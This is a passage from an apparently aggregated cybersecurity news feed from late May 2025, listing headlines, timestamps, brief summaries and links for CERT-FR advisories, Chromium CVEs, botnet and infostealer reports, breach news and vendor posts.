De multiples vulnérabilités ont été découvertes dans Microsoft Edge. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0462/
Multiples vulnérabilités dans IBM Db2 (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans IBM Db2. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et un déni de service à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0467/
Multiples vulnérabilités dans le noyau Linux de Red Hat (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0466/
Multiples vulnérabilités dans le noyau Linux de Debian (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0464/
Multiples vulnérabilités dans le noyau Linux de Debian LTS (30 mai 2025)
2025-05-30T00:00:00Z | 1748563200

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0463/
Chasing Eddies: New Rust-based InfoStealer used in CAPTCHA campaigns
2025-05-30T00:00:00Z | 1748563200

Elastic Security Labs walks through EDDIESTEALER, a lightweight commodity infostealer used in emerging CAPTCHA-based campaigns.

https://www.elastic.co/security-labs/eddiestealer
Um ataque hacker pode estar mais perto do que imagina!
2025-05-29T23:05:11Z | 1748559911

https://nsfocusglobal.com/web-stories/um-ataque-hacker-pode-estar-mais-perto-do-que-imagina/
From Code Red to Rust: Microsoft's Security Journey
2025-05-29T22:04:28Z | 1748556268

At this year's Build developer conference, Microsoft reflected on what the company learned about securing features and writing secure code in the early 2000s.

https://www.darkreading.com/application-security/from-code-red-to-rust-microsoft-security-journey
Here’s what you missed on Office Hours: May 2025
2025-05-29T21:59:17Z | 1748555957

https://redcanary.com/blog/security-operations/office-hours-may-2025/
Microsoft's May Patch Tuesday update fails on some Windows 11 VMs
2025-05-29T21:46:42Z | 1748555202

'The operating system couldn't be loaded' is never a great message Microsoft's latest Patch Tuesday update is failing to install on some Windows 11 machines, mostly virtual ones, and dumping them into recovery mode with a boot error. Its only recommendation to avoid the problem for now is to dodge the update.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/microsoft_windows_problems/
NSA, CISA Urge Organizations to Secure Data Used in AI Models
2025-05-29T21:03:51Z | 1748552631

New guidance includes a list of 10 best practices to protect sensitive data throughout the AI life cycle, as well as tips to address supply chain and data-poisoning risks.

https://www.darkreading.com/cyber-risk/nsa-cisa-gudnceai-secure-data-ai-models
Netskope Threat Coverage: Scattered Spider
2025-05-29T20:54:44Z | 1748552084

The adversary group commonly referred to as Scattered Spider is also tracked as UNC3944, Muddled Libra, Octo Tempest, Starfraud, Scatter Swine, 0ktapus, Roasted 0ktapus, and Storm-0875. Active since at least 2022, this financially motivated group has rapidly gained notoriety for its social engineering campaigns and ransomware attacks, which span multiple sectors. Initially focused on telecom […] The post Netskope Threat Coverage: Scattered Spider appeared first on Netskope.

https://www.netskope.com/blog/netskope-threat-coverage-scattered-spider
Victoria's Secret Goes Offline After 'Incident' Claims
2025-05-29T20:52:37Z | 1748551957

The lingerie retailer isn't revealing much about the security incident it's dealing with but has brought in third-party experts to address the issue.

https://www.darkreading.com/endpoint-security/victoria-secret-website-security-incident
New Botnet Plants Persistent Backdoors in ASUS Routers
2025-05-29T20:49:09Z | 1748551749

Thousands of ASUS routers have been infected and are believed to be part of a wide-ranging ORB network affecting devices from Linksys, D-Link, QNAP, and Araknis Network.

https://www.darkreading.com/vulnerabilities-threats/botnet-persistent-backdoors-asus-routers
SentinelOne Reports Services Are Back Online After Global Outage
2025-05-29T20:35:37Z | 1748550937

The outage reportedly hit 10 commercial customer consoles for SentinelOne's Singularity platform, including Singularity Endpoint, XDR, Cloud Security, Identity, Data Lake, RemoteOps, and more.

https://www.darkreading.com/endpoint-security/sentinelone-reports-services-back-online-after-global-outage
Scammers Exploit Uncertainty Surrounding US Tariffs
2025-05-29T20:25:49Z | 1748550349

Cybersecurity experts are warning that scammers are taking advantage of uncertainty surrounding the U.S. administration’s tariff policies, CNBC reports.

https://blog.knowbe4.com/scammers-exploit-uncertainty-surrounding-us-tariffs
Zscaler's Buyout of Red Canary Shows Telemetry's Value
2025-05-29T20:18:00Z | 1748549880

Red Canary's MDR portfolio complements Zscaler's purchase last year of Israeli startup Avalor, which automates collection, curation, and enrichment of security data.

https://www.darkreading.com/cybersecurity-operations/zscaler-buyout-red-canary-telemetrys-value
APT41 Uses Google Calendar Events for C2
2025-05-29T20:10:15Z | 1748549415

APT41, a Chinese state-sponsored threat actor also known as "Double Dragon," used Google Calendar as command-and-control infrastructure during a campaign last fall.

https://www.darkreading.com/threat-intelligence/apt41-uses-google-calendar-events-c2
Why is China deep in US networks? 'They're preparing for war,' HR McMaster tells lawmakers
2025-05-29T19:51:33Z | 1748548293

House Homeland Security Committee takes a field trip to Silicon Valley Chinese government spies burrowed deep into American telecommunications systems and critical infrastructure networks for one reason, according to retired US Army Lt. Gen. H.R. McMaster.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/china_preparing_war_mcmaster/
Hardware Hacking a Nicotine Vape
2025-05-29T19:10:24Z | 1748545824

Praetorian recently finished a tour de force at Hack Space Con, providing paid training, a workshop, and three talks: The entire Praetorian team had a blast at the conference, sharing our knowledge with the security community and making many new friends. HackVapeCon Before the conference started, four members of Praetorian’s Internet of Things (IoT) team […] The post Hardware Hacking a Nicotine Vape appeared first on Praetorian.

https://www.praetorian.com/blog/hardware-hacking-a-nicotine-vape/
Chromium: CVE-2025-5066 Inappropriate implementation in Messages
2025-05-29T19:06:23Z | 1748545583

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5066
Chromium: CVE-2025-5067 Inappropriate implementation in Tab Strip
2025-05-29T18:55:16Z | 1748544916

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5067
Chromium: CVE-2025-5283 Use after free in libvpx
2025-05-29T18:55:14Z | 1748544914

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5283
Chromium: CVE-2025-5281 Inappropriate implementation in BFCache
2025-05-29T18:55:12Z | 1748544912

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5281
Chromium: CVE-2025-5065 Inappropriate implementation in FileSystemAccess API
2025-05-29T18:55:09Z | 1748544909

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5065
Chromium: CVE-2025-5064 Inappropriate implementation in Background Fetch API
2025-05-29T18:55:07Z | 1748544907

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5064
Chromium: CVE-2025-5280 Out of bounds write in V8
2025-05-29T18:55:05Z | 1748544905

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5280
Chromium: CVE-2025-5063 Use after free in Compositing
2025-05-29T18:55:01Z | 1748544901

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-5063
The Rise of Slopsquatting: A New Software Supply Chain Threat
2025-05-29T18:50:23Z | 1748544623

As organizations increasingly embrace AI-powered coding tools to accelerate development and reduce engineering overhead, a new threat is emerging at the intersection of generative AI and open-source software (OSS): slopsquatting. The post The Rise of Slopsquatting: A New Software Supply Chain Threat  first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/the-rise-of-slopsquatting-a-new-software-supply-chain-threat/
A Swedish MMA Tournament Spotlights the Trump Administration's Handling of Far-Right Terrorism
2025-05-29T18:14:03Z | 1748542443

A member of a California-based fight club seems to have attended an event hosted by groups with ties to an organization the US government labeled a terrorist group. Will the Trump administration care?

https://www.wired.com/story/socal-active-club-nordic-resistance-movement/
Official Root Cause Analysis (RCA) for SentinelOne Global Service Interruption – May 29, 2025
2025-05-29T18:09:51Z | 1748542191

UPDATE 3 (20:47 UTC, May 31, 2025): A Root Cause Analysis into the May 29, service disruption has been completed and can be found below. Official RCA for May 29 Service Disruption On May 29, 2025, SentinelOne experienced a global service disruption affecting multiple customer-facing services. During this period, customer endpoints remained protected, but security […]

https://www.sentinelone.com/blog/update-on-may-29-outage/
A new author has appeared
2025-05-29T18:00:06Z | 1748541606

Talos Content Manager Amy introduces themself, shares her unconventional journey into cybersecurity and reports on threats masquerading as AI installers.

https://blog.talosintelligence.com/a-new-author-has-appeared/
Healthcare Data Security: How to Stay Ahead of Threats in a High-Stakes Industry
2025-05-29T18:00:00Z | 1748541600

Healthcare data security is not just an IT concern, but a fundamental pillar of patient care and organizational survival. From electronic health records (EHRs) to connected medical devices and cloud-based systems, the sector has embraced innovation. But with that innovation comes risk.  According to Sophos, 67% of healthcare organizations experienced ransomware attacks in 2024. And another study shows that healthcare has long been a big target:... Read more » The post Healthcare Data Security: How to Stay Ahead of Threats in a High-Stakes Industry appeared first on Plixer.

https://www.plixer.com/blog/healthcare-data-security/
AI video just took a startling leap in realism. Are we doomed?
2025-05-29T17:58:09Z | 1748541489

Google's Veo 3 delivers AI videos of realistic people with sound and music. We put it to the test.

https://arstechnica.com/ai/2025/05/ai-video-just-took-a-startling-leap-in-realism-are-we-doomed/
PumaBot Targets Linux Devices in Latest Botnet Campaign
2025-05-29T17:34:16Z | 1748540056

While the botnet may not be completely automated, it uses certain tactics when targeting devices that indicate that it may, at the very least, be semiautomated.

https://www.darkreading.com/threat-intelligence/pumabot-targets-linux-devices-botnet-campaign
Victoria’s Secret Website Down After Security Incident
2025-05-29T17:26:11Z | 1748539571

The U.S. website of Victoria’s Secret is down after an unspecified security incident, the latest in a series of cyber incidents hitting retailers. A status message on the Victoria’s Secret website says the company “identified and are taking steps to address a security incident. We have taken down our website and some in store services as a precaution. Our team is working around the clock to fully restore operations.” Victoria’s Secret and PINK stores remain open, the status message reads. It is not clear what type of security incident was involved or whether customer data was affected. In a statement to The Cyber Express, a Victoria’s Secret spokesperson said the company “immediately enacted our response protocols” and engaged “third-party experts” for assistance. “We are working to quickly and securely restore operations,” the spokesperson added. Victoria’s Secret Latest Retail Cyber Incident The Victoria’s Secret website incident is the latest in a string of cyber incidents hitting retailers in recent weeks. The cyber spree targeting retailers began in late April, when three UK retailers were hit in a matter of days. Those attacks have been attributed to the Scattered Spider threat group and reportedly involved the deployment of DragonForce ransomware. Other recent cybersecurity incidents have affected Dior and Adidas, and Google warned in mid-May that Scattered Spider was apparently targeting U.S. retailers. Victoria’s Secret, which has generated more than $6 billion in sales in the last year, saw its shares (NYSE:VSCO) fall more than 10% since news of the security incident broke on Wednesday. Bloomberg reported that an internal company communication said recovery from the security incident could take “awhile.” Defending Against Scattered Spider After the UK retail incidents, the UK’s National Cyber Security Centre issued guidance for retailers to protect their operations from cyberattacks. Those steps include: Using multi-factor authentication Monitoring for signs of account misuse, such as “risky logins” within Microsoft Entra ID Protection Monitoring Domain Admin, Enterprise Admin, and Cloud Admin accounts and making sure that any access is legitimate Review helpdesk password reset processes, including procedures for authenticating staff credentials before resetting passwords Making sure that security operation centers can identify suspicious logins, such as from VPN services in residential ranges Following tactics, techniques, and procedures sourced from threat intelligence “whilst being able to respond accordingly.” Google has also issued recent guidance for defending against Scattered Spider attacks.

https://thecyberexpress.com/victorias-secret-website-down-after-incident/
Qualys TRU Discovers Two Local Information Disclosure Vulnerabilities in Apport and systemd-coredump: CVE-2025-5054 and CVE-2025-4598
2025-05-29T17:16:00Z | 1748538960

The Qualys Threat Research Unit (TRU) has discovered two local information-disclosure vulnerabilities in Apport and systemd-coredump. Both issues are race-condition vulnerabilities. The first (CVE-2025-5054) affects Ubuntu’s core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora. […]

https://blog.qualys.com/category/vulnerabilities-threat-research
Defending against evolving identity attack techniques
2025-05-29T17:00:00Z | 1748538000

Threat actors continue to develop and leverage various techniques that aim to compromise cloud identities. Despite advancements in protections like multifactor authentication (MFA) and passwordless solutions, social engineering remains a key aspect of phishing attacks. Implementing phishing-resistant solutions, like passkeys, can improve security against these evolving threats. The post Defending against evolving identity attack techniques appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/05/29/defending-against-evolving-identity-attack-techniques/
US government sanctions tech company involved in cyber scams
2025-05-29T16:56:31Z | 1748537791

The Treasury said Funnull was involved in providing infrastructure for pig butchering crypto scams.

https://techcrunch.com/2025/05/29/us-government-sanctions-tech-company-involved-in-cyber-scams/
AI governance requires trustworthy, values-driven leadership
2025-05-29T16:45:23Z | 1748537123

What does values-driven leadership look like in the world of artificial intelligence (AI)? And what responsibilities do AI consumers have? The post AI governance requires trustworthy, values-driven leadership appeared first on The Aspen Institute.

https://www.aspeninstitute.org/blog-posts/ai-governance-requires-trustworthy-values-driven-leadership/
Navigating the ViDA revolution: What multinationals need to know about e-invoicing in Europe
2025-05-29T16:39:03Z | 1748536743

The landscape of VAT compliance in Europe is undergoing a seismic shift. The ViDA (VAT in the Digital Age) proposal, approved on March 11, 2025, signals a new era for multinational companies. This landmark initiative aims to modernize and streamline VAT processes across the EU, primarily through the widespread adoption of e-invoicing and digital reporting. While this promises greater efficiency and transparency, it also presents significant challenges for businesses operating across multiple European nations.  The three pillars of ViDA  The ViDA proposal rests on three key pillars:  E-Invoicing and Digital Reporting Requirements: This pillar focuses on real-time digital reporting of VAT transactions, mandating cross-border e-invoicing to ensure accuracy and reduce fraud. Restrictions on e-invoicing will be removed, paving the way for full digital adoption.  Single VAT Registration in the EU: ViDA simplifies VAT compliance by allowing businesses to register for VAT only once across the entire EU, streamlining operations and reducing administrative burdens.  Enhanced Rules Around Digital Platforms: The rules ensure VAT is correctly applied to transactions facilitated by online platforms, making platforms responsible for VAT collection and remittance.  The e-invoicing revolution: Obligations and timelines  The most immediate impact of ViDA will be on the world of e-invoicing. The proposal mandates that all cross-border transactions must be electronically invoiced and reported in near-real-time with the objective of streamlining VAT reporting and reducing fraud.  A key change is the removal of the "buyer acceptance" principle, which previously allowed buyers to refuse electronic invoices. This restriction has hindered the widespread adoption of e-invoicing and prevented countries from mandating it nationally. With these restrictions lifted, countries are expected to implement e-invoicing mandates more rapidly.  While the directive sets a deadline of July 1, 2030, for full integration of e-invoicing and digital reporting requirements into national legislation, many countries are expected to implement these changes much sooner.  The challenges for multinationals  Multinational companies face a complex challenge. With approximately ten EU member states already implementing their own e-invoicing mandates and the remaining seventeen expected to follow, businesses can anticipate dealing with an average of three to four new e-invoicing mandates per year until mid-2030. Given that implementing a single e-invoicing mandate can take enterprises up to two years, this represents a significant burden on resources.  OpenText's commitment to ViDA compliance  As a leading provider of global e-invoicing services, OpenText is committed to supporting businesses through these changes. The OpenText Trading Grid e-Invoicing solution is already equipped to manage e-invoicing regulations in over fifty countries. OpenText provides a managed services approach to e-invoicing, offering an end-to-end solution that includes evaluating readiness and supporting integrations with internal systems, external stakeholders, and national e-invoicing portals, as well as maintaining ongoing compliance with any changes that follow.  The approval of the ViDA report marks a monumental step towards a more efficient and transparent VAT system in Europe. While the transition presents challenges, it also offers opportunities for businesses to streamline their operations and reduce costs. Companies that proactively prepare for these changes will be best positioned to thrive in the new digital landscape. Stay tuned for further updates as the ViDA proposal is implemented and its impact unfolds.  Learn more about OpenText’s OpenText Trading Grid e-Invoicing. The post Navigating the ViDA revolution: What multinationals need to know about e-invoicing in Europe  appeared first on OpenText Blogs.

https://blogs.opentext.com/navigating-the-vida-revolution-what-multinationals-need-to-know-about-e-invoicing-in-europe/
8,000+ Asus routers popped in 'advanced' mystery botnet plot
2025-05-29T16:23:09Z | 1748535789

No formal attribution made but two separate probes hint at the same suspect Thousands of Asus routers are currently ensnared by a new botnet that is trying to disable Trend Micro security features before exploiting vulnerabilities for backdoor access.

https://go.theregister.com/feed/www.theregister.com/2025/05/29/8000_asus_routers_popped_in/
LexisNexis Informs 360K+ Customers of Third-Party Data Leak
2025-05-29T16:18:24Z | 1748535504

While the leak affected customer data, LexisNexis said in a notification letter that its products and systems were not compromised.

https://www.darkreading.com/cyberattacks-data-breaches/lexisnexis-360k-customers-third-party-data-leak
Customer Story: The Cloud Crew & Digital Shield
2025-05-29T16:12:40Z | 1748535160

The post Customer Story: The Cloud Crew & Digital Shield appeared first on Graylog.

https://graylog.org/resources/customer-story-the-cloud-crew-digital-shield/
4 trends shaping open source funding—and what they mean for maintainers
2025-05-29T16:00:00Z | 1748534400

Get insights on the latest trends from GitHub experts while catching up on these exciting new projects. The post 4 trends shaping open source funding—and what they mean for maintainers appeared first on The GitHub Blog.

https://github.blog/open-source/maintainers/4-trends-shaping-open-source-funding-and-what-they-mean-for-maintainers/
How to deploy AI safely
2025-05-29T16:00:00Z | 1748534400

Microsoft Deputy CISO Yonatan Zunger shares tips and guidance for safely and efficiently implementing AI in your organization. The post How to deploy AI safely appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/05/29/how-to-deploy-ai-safely/
What the LockBit Data Breach Reveals About Its Inner Workings
2025-05-29T16:00:00Z | 1748534400

What does the LockBit data breach reveal about the group’s inner workings?

https://www.securitymagazine.com/articles/101656-what-the-lockbit-data-breach-reveals-about-its-inner-workings
Reuters: US sanctions Philippines digital infrastructure provider linked to virtual currency scams
2025-05-29T15:54:36Z | 1748534076

The post Reuters: US sanctions Philippines digital infrastructure provider linked to virtual currency scams appeared first on Silent Push.

https://www.reuters.com/sustainability/boards-policy-regulation/us-sanctions-philippines-digital-infrastructure-provider-linked-virtual-currency-2025-05-29/#new_tab
U.S. Sanctions Cloud Provider ‘Funnull’ as Top Source of ‘Pig Butchering’ Scams
2025-05-29T15:52:56Z | 1748533976

The post U.S. Sanctions Cloud Provider ‘Funnull’ as Top Source of ‘Pig Butchering’ Scams appeared first on Silent Push.

https://krebsonsecurity.com/2025/05/u-s-sanctions-cloud-provider-funnull-as-top-source-of-pig-butchering-scams/#new_tab
Cybercriminals Target AI Users with Malware-Loaded Installers Posing as Popular Tools
2025-05-29T15:47:00Z | 1748533620

Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. "CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan...

https://thehackernews.com/2025/05/cybercriminals-target-ai-users-with.html
SASE + Microsegmentation = Zero Trust
2025-05-29T15:37:00Z | 1748533020

In early 2025 Gartner identified two strategies that, when combined, achieve a full zero trust architecture: Microsegmentation and Secure Access Service Edge (SASE). (see Gartner Strategic Roadmap for Zero Trust Implementation, 2025) In this short post we’ll explain why SASE alone is not enough, and why to achieve a truly comprehensive Zero Trust architecture, SASE must be combined with microsegmentation. SASE: An Incomplete Zero Trust Strategy SASE focuses on user access, ensuring users…

https://zeronetworks.com/blog/sase-microsegmentation-zero-trust
SLAM NHS Foundation Trust turns to iboss for superior cybersecurity
2025-05-29T15:25:00Z | 1748532300

See how South London and Maudsley NHS Foundation Trust is using iboss to cut costs and boost productivity. The post SLAM NHS Foundation Trust turns to iboss for superior cybersecurity appeared first on iboss.

https://www.iboss.com/case-studies/slam-nhs-foundation-trust-turns-to-iboss-for-superior-cybersecurity/
Are Airport IT Teams Feeling the Heat of Summer Travel?
2025-05-29T14:35:13Z | 1748529313

Why is airport Wi-Fi so painfully slow? It’s a familiar complaint and a constant source of frustration. Whether they’re scanning, swiping, streaming, or checking in, travelers count on digital services to work flawlessly from curb to gate. As the summer travel season kicks into high gear, how can airport IT teams keep...

https://www.netscout.com/blog/are-airport-it-teams-feeling-heat-summer-travel
Breach at data analytics firm impacts 364,000 people
2025-05-29T14:33:29Z | 1748529209

Hackers used company GitHub account to steal software bits and personal information, company admits

https://www.itpro.com/security/data-breaches/lexisnexis-data-breach-disclosure
One Platform, Total OT Protection: Cato’s Response to CISA’s Mitigation Guidelines
2025-05-29T14:32:03Z | 1748529123

When OT Devices Are Left Exposed  It started with a sudden alteration in chemical levels in the water treatment system. When a threat actor adjusted the level of sodium hydroxide to more than 100 times its normal amount, millions were at risk of being poisoned. Luckily, it was stopped in time.  This is not fiction.... The post One Platform, Total OT Protection: Cato’s Response to CISA’s Mitigation Guidelines  appeared first on Cato Networks.

https://www.catonetworks.com/blog/one-platform-total-ot-protection/
UK Military Unveils £1B ‘Digital Targeting Web’
2025-05-29T14:30:12Z | 1748529012

In a bold pivot toward modern warfare, the UK Ministry of Defence (MOD) has announced a £1 Billion (approximately $1.35B) investment to build out a battlefield AI system dubbed the “Digital Targeting Web” and to stand up a dedicated Cyber and Electromagnetic Command. The initiative—announced Thursday by Defence Secretary John Healey—marks a significant inflection point in the UK’s defense posture, aimed squarely at matching the digital tempo of modern conflict. The new capabilities are core deliverables under the UK’s Strategic Defence Review (SDR), which lays out a ten-year transformation plan for British defense. The timing, optics, and scope send a clear message: warfare is evolving fast, and the UK intends to lead from the front. From Corsham to Combat: Connecting the Kill Chain The Digital Targeting Web is, in essence, a battlefield operating system. It’s designed to accelerate how UK forces identify, coordinate, and engage threats—linking sensors, platforms, and weapons across land, air, sea, and cyberspace into a single responsive network. Think real-time target handoffs between a satellite, an F-35, a drone, and a cyber operator—all in seconds, not minutes, the MOD explained. This is likely the blueprint for how modern battles will be fought and won, Healey called out during a visit to MOD Corsham, the UK military’s cyber headquarters. According to the MOD, the system will bring together AI, advanced sensors, space-based ISR (intelligence, surveillance, reconnaissance), and cyber capabilities to enable rapid kill-chain execution. In layman’s terms: detect a threat, decide on action, and destroy it—faster than the enemy can blink. The new system draws directly from lessons learned in Ukraine, where the Ukrainian military’s ability to find, fix, and finish Russian targets rapidly turned the tide in early 2022. British military planners see similar tempo and scale as essential to deterring or defeating threats in the future. Cyber Warfare Goes Operational Alongside the battlefield system, the UK is establishing a Cyber and Electromagnetic Command (CyberEM Command)—tasked with both defending MOD networks and leading offensive cyber ops in collaboration with the UK’s National Cyber Force. It comes at a time when UK defense systems are under near-constant digital siege. The MOD reported over 90,000 “sub-threshold” cyber intrusions over the past two years—malicious probes that fall just short of triggering a formal response but collectively represent a growing threat landscape. This new command will centralize capabilities across the armed services to degrade enemy command-and-control, jam enemy drones and communications, and conduct electromagnetic warfare with precision. It also answers a longer-standing challenge within NATO—how to give cyber and electronic warfare the same tactical footing as tanks or jets. With the creation of this command, the UK joins countries like the U.S. and Estonia in treating cyber as a core warfighting domain. Recruiting a Cyber Force, Not Just a Cyber Team To power this new digital-first force, the MOD is doubling down on cyber talent. A new Cyber Direct Entry program will offer recruits tailored training and rapid placement into operational cyber roles—with salaries starting over £40,000 and potential for £25,000 in additional pay. It’s a clear departure from traditional defense recruiting. Candidates won’t need to carry a rifle or serve in hostile environments. Instead, they’ll be dropped into cyber roles by late 2025, handling missions that matter just as much as physical deployments. It’s also a bet that the best digital talent in the UK is out there—and willing to serve—if offered the right path. The Larger Picture The announcement comes as the UK commits to increasing defense spending to 2.5% of GDP, signaling renewed political will to modernize forces in the face of rising global threats—from Russia’s ongoing aggression to the strategic pressure points in the Indo-Pacific. Also read: UK Ministry of Defence Suffers Major Data Breach, China’s Involvement Suspected But it’s not just about money or tech. The SDR and this week’s launch of the Cyber Command and Targeting Web reflect a fundamental rethinking of how Britain fights—and what kind of force it needs for the 2030s and beyond. “The hard-fought lessons from Putin’s illegal war in Ukraine leave us under no illusions that future conflicts will be won through forces that are better connected, better equipped and innovating faster than their adversaries,” Healey said. “We will give our Armed Forces the ability to act at speeds never seen before - connecting ships, aircraft, tanks and operators so they can share vital information instantly and strike further and faster.” The UK is betting that its next battlefield advantage won’t just come from firepower—but from firmware.

https://thecyberexpress.com/uk-military-unveils-1b-digital-targeting-web/
Infrastructure Used to Manage Domains Related to Cryptocurrency Investment Fraud Scams between October 2023 and April 2025
2025-05-29T14:30:00Z | 1748529000

Infrastructure Used to Manage Domains Related to Cryptocurrency Investment Fraud Scams between October 2023 and April 2025

https://www.ic3.gov/CSA/2025/250529.pdf
A decade in, bootstrapped Thinkst Canary reaches $20M in ARR without VC funding
2025-05-29T14:10:02Z | 1748527802

Reflecting on 10 years since its launch, the honeypot maker explains why the company did not take on any VC funding.

https://techcrunch.com/2025/05/29/a-decade-in-bootstrapped-thinkst-canary-reaches-20m-in-arr-without-vc-funding/
Reducing Your Exposure to the Next Zero Day: A New Path Forward
2025-05-29T14:01:08Z | 1748527268

Zero-day vulnerabilities are the bogeymen of cybersecurity. They lurk unseen in our systems until the moment of exploitation, leaving defenders with no time to prepare. Our goal at RunSafe is to give defenders a leg up against attackers, so we wondered: What if we could quantify this seemingly unquantifiable risk? What if we could take […] The post Reducing Your Exposure to the Next Zero Day: A New Path Forward appeared first on RunSafe Security.

https://runsafesecurity.com/blog/reducing-zero-day-risk/
A Defense-in-Depth Approach for the Modern Era
2025-05-29T14:00:00Z | 1748527200

By integrating intelligent network policies, zero-trust principles, and AI-driven insights, enterprises can create a robust defense against the next generation of cyber threats.

https://www.darkreading.com/vulnerabilities-threats/defense-depth-approach-modern-era
New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers
2025-05-29T13:16:00Z | 1748524560

Cybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet. The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable. While the DOS header makes the executable file backward compatible...

https://thehackernews.com/2025/05/new-windows-rat-evades-detection-for.html
Getting Ahead of AI Risk: What Comes Next for Tenable
2025-05-29T13:02:00Z | 1748523720

The acquisition of Apex Security adds a powerful new layer of visibility, context and control to the Tenable One Exposure Management Platform to govern usage, enforce policy and control exposure across both the AI that organizations use and the AI they build.Over the past 25 years, we’ve seen the attack surface shift dramatically — from traditional on-prem environments to cloud, to OT/IOT, and more. But the changes we’re seeing right now with AI feel different. Faster. More disruptive. And, frankly, more unpredictable.That’s why I’m excited to share that Tenable has signed a definitive agreement to acquire Apex Security, a company we’ve been following for some time. They've built a powerful product that solves real problems in the emerging world of AI risk. Their focus is helping organizations secure both the AI they use and the AI they build — a problem that's becoming more critical every day.It’s clear we’re in the early stages of a major shift. Developers are integrating large language models into products and internal tools. Employees are using generative tools in everyday workflows. AI is everywhere — but the tools to manage that risk at scale? Not so much.Last year, we introduced AI Aware to help organizations get visibility into shadow AI. It’s been incredible to see how quickly customers adopted it — more than 6,400 customers in over 100 countries are using it today. But we also heard loud and clear: visibility isn’t enough. Security leaders want to govern usage, enforce policy, and prevent exposures before attackers take advantage. That’s exactly what Apex was built to do.Their technology adds a powerful layer of visibility, context, and control to what we’re building with Tenable One - our exposure management platform for your entire enterprise. Once the deal closes, we will move quickly to integrate these capabilities into the platform.This isn’t just about adding another feature — it’s about helping customers take action during a critical window of time. Most organizations haven’t yet experienced a large-scale AI-driven attack. That’s the point. We have a unique opportunity to get ahead of the threat — to define how AI is secured before attackers define it for us.I’m proud of the team at Tenable for continuing to lead in Exposure Management, and I’m looking forward to welcoming our future teammates from Apex once the deal closes. This is how we stay in front of the attack surface — by seeing where it’s going, and building for it now.More to come soon.

https://www.tenable.com/blog/getting-ahead-of-ai-risk-what-comes-next-for-tenable
Damage Control: Why Building Cyber Resilience Is Non-Negotiable
2025-05-29T13:00:00Z | 1748523600

It?s only a matter of time before attackers find a crack in your security armour. Learn how to combine resilience with compliance and protect what matters most.

https://www.akamai.com/blog/security/2025/may/damage-control-why-building-cyber-resilience-non-negotiable
Advanced EDR Protection: Symantec and Carbon Black Earn Perfect Scores in SE Labs Test
2025-05-29T13:00:00Z | 1748523600

Symantec Endpoint Security Complete and Carbon Black Cloud earn coveted AAA rating by scoring 100% for detecting and blocking hundreds of ransomware attacks

https://www.security.com/feature-stories/symantec-and-carbon-black-earn-perfect-scores-se-labs-test
Thrive in Chaos: How to Get Your Minimum Viable Company Back Online
